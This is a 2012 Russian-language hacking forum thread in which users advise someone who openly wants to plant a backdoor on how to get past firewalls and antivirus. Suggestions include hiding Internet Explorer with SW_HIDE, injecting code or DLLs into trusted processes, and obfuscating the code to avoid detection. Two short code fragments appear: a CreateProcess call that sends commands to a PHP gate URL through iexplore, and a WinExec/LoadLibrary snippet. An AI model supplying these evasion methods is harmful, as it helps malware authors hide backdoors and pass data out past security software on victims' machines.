|
Методы обхода фаервлов (firewall)
| |
| Android | Дата: Понедельник, 30.01.2012, 16:56 | Сообщение # 1 |
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| Ребята, стандартный фаер винды можно отключить командой из кнсоли. Еще можно добавиться в список доверенных приложений.
А есть ли какой-то универсальный метод, чтоб факт сетевого соединения остался либо незамеченным, либо фаер (не стандартный) на него не ругался???
Поделитесь мыслями на этот счет, плз.
|
| |
| |
| Android | Дата: Понедельник, 30.01.2012, 17:13 | Сообщение # 2 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| Классная статья по поводу внедрения своего кода в чужой процесс на этом сайте. Как вы думаете, товарисчи, можно ли описанным методом грохать фаеры и антивири???
|
| |
| |
| XSPY | Дата: Понедельник, 30.01.2012, 21:25 | Сообщение # 3 |
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| Android, можно,но сложно-дрова и самозащита некоторых ох какая настырная...
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| vvova15 | Дата: Вторник, 31.01.2012, 10:14 | Сообщение # 4 |
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| фаер можно обойти используя internet explorer - ему можно в сеть выходить без базара и он находиться в списке доверенных.
так что используй его com-модель или запускай через createprocess с нужными параметрами
ICQ 185-398
|
| |
| |
| Android | Дата: Четверг, 02.02.2012, 22:52 | Сообщение # 5 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| а если я хочу бэкдор впарить , каким образом можно эксплорер заюзать??? вот подскажите плиз практическим советом...
|
| |
| |
| gravitas | Дата: Пятница, 03.02.2012, 09:02 | Сообщение # 6 |
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Ну можно, как сказал вован, запустить IE в скрытом виде (SW_HIDE). Потом проинжектить в его процесс свой код (исходник инжекта я выкладывал тут недавно).
Это, конечно, если ты там через сокеты будешь делать быкдур. Если делаешь с чем-то вроде ICQ клиента, то такой способ не проканает.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Android | Дата: Пятница, 03.02.2012, 10:50 | Сообщение # 7 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| а если делать через сокеты, то наверняка получится после инжекта обойти фаер??? щас же многие палят инжекты...
|
| |
| |
| dolphin | Дата: Пятница, 03.02.2012, 20:07 | Сообщение # 8 |
Администратор
Сообщений: 906
Статус: Offline
| Инжект + обфуксить код, не все спалят, обе темы обсуждались
http://delfcode.ru/search/?q=%D0%98%D0%BD%D0%B6%D0%B5%D0%BA%D1%82
http://delfcode.ru/forum/10-600-1
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| vvova15 | Дата: Суббота, 04.02.2012, 06:20 | Сообщение # 9 |
|
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| нжект воспримется авирями в шктыки.
можно сделать гейт на php для отправки
и запускать типа
Code
CreateProcess(... "iexplore","http://ololo.ru/gate.php?cmd=и тут команда в байтах и процентах(urlencode), которая отправляется серверу скриптом",....)
ICQ 185-398
|
| |
| |
| dolphin | Дата: Суббота, 04.02.2012, 11:20 | Сообщение # 10 |
|
Администратор
Сообщений: 906
Статус: Offline
| Quote (vvova15) гейт на php
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| Android | Дата: Суббота, 04.02.2012, 12:45 | Сообщение # 11 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| видимо, единственный путь - грохать фаер и заменять фейком...
|
| |
| |
| dolphin | Дата: Суббота, 04.02.2012, 14:21 | Сообщение # 12 |
|
Администратор
Сообщений: 906
Статус: Offline
| А подргузка dll в эксплорер или опера не подходит?
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| gravitas | Дата: Суббота, 04.02.2012, 16:42 | Сообщение # 13 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Без инжекта грузануть длл в определенный процесс? Хотя, впринципе можно просто LoadLibrary вызвать в своей проге, а уже в дллке проверять, в какой она проге.
P.S. Вроде вполне реальный обход.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Android | Дата: Суббота, 04.02.2012, 21:49 | Сообщение # 14 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| ребят... я че-то по ходу ваще не в теме... а подгрузка своей длл в чужой процесс - это не инжект??????
|
| |
| |
| Волк-1024 | Дата: Суббота, 04.02.2012, 21:54 | Сообщение # 15 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Quote а подгрузка своей длл в чужой процесс - это не инжект??????
Оно самое.
И что-то тут одно пустословие. Нужно слова сопровождать кодом.
Например, вот инжект библиотеки по пиду процесса (выдрал из своей проги):
Доступно только для пользователей
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Суббота, 04.02.2012, 22:01 |
| |
| |
| gravitas | Дата: Воскресенье, 05.02.2012, 10:06 | Сообщение # 16 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Волк-1024, код твой палится, и фаерволами тоже.
Quote (Android) ребят... я че-то по ходу ваще не в теме... а подгрузка своей длл в чужой процесс - это не инжект??????
Если просто вызвать LoadLibrary, то нужная длл подгрузится во все оконные процессы.
Только отвечая на вопрос понял, что
Code
WinExec('iexplore.exe', SW_HIDE);
LoadLibrary('mydll.dll');
не проканает, ибо нужно окно. Без инжекта в безоконное приложение можно подгрузить длл как-нить?
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Волк-1024 | Дата: Воскресенье, 05.02.2012, 12:11 | Сообщение # 17 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Quote код твой палится, и фаерволами тоже.
Странно... Мой Нод ничего не вякает, ни на сам код, ни на инжект. Хотя возможно из-за того, что я его выдрал из нормальной проги, не малвари.
Gravitas: на scan4you.net будет примерно 12\37, я проверял как то
Pascal, C\C++, Assembler, Python
|
| |
| |
| Android | Дата: Понедельник, 06.02.2012, 10:54 | Сообщение # 18 |
|
Постоянный
Зарегистрирован: 13.12.2011
Группа: Пользователи
Сообщений: 100
Статус: Offline
| а ты его как выдрал? дизассемблировал или исходник изначально был???
|
| |
| |
| Волк-1024 | Дата: Понедельник, 06.02.2012, 14:28 | Сообщение # 19 |
|
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Android, "Выдрал" подразумевается, что у меня есть исходник моей же проги 
Pascal, C\C++, Assembler, Python
|
| |
| |
|
